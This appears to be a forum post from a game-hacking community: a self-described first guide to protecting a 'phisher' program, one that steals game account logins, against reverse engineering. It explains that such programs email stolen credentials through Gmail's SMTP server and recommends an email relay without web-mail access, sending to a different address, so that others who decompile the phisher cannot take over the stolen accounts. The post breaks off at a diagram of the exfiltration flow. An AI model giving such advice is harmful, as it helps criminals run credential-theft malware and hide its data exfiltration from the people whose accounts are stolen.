Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

[Guide] Reverse engineer proof your Phisher App!

Okay, this is my first attempt at a guide so beware.

My opinion of difficulty: [XXX--]
    Reason: Simple concept, somewhat difficult to execute.
    This guide assumes:
    A) You have basic knowledge of Visual Basic and have access to it (or Visual Studio).
    B) You are familiar with how these phisher programs work.
    C) You are familiar with how email relaying/smtp servers work.

1. Basic Idea/How things normally work:
    The basic idea of doing this is to prevent http://www.mmowned.com/forums/wow-sc...g-youtube.html from happening to you. Basically, the way that the ShAnX and most application (program.exe) phishers are written is to send an email through GMail's smtp server. The super-basic way of doing this is sending an email from the account to the same account. Enhanced security would mean sending the email to a different account than the gmail account but if someone were to gain access, they just need to check your Sent emails folder/change the password and you're screwed.

2. What's the point and what's the process?
    Well, you spent all this time making an awesome phisher and stuff, you don't want to ruin it because some leecher here read the above guide and is, well, leeching off all your hard work. Now the process is simple, using an email relayer that DOES NOT have web-mail access to send the email to a DIFFERENT address. Simple. Here's a diagram for those that are lost:

Normal Way:
    User presses activate in phisher -> phisher logs into smtp.google.com with username/password -> phisher sends email to address in code -> email account receives email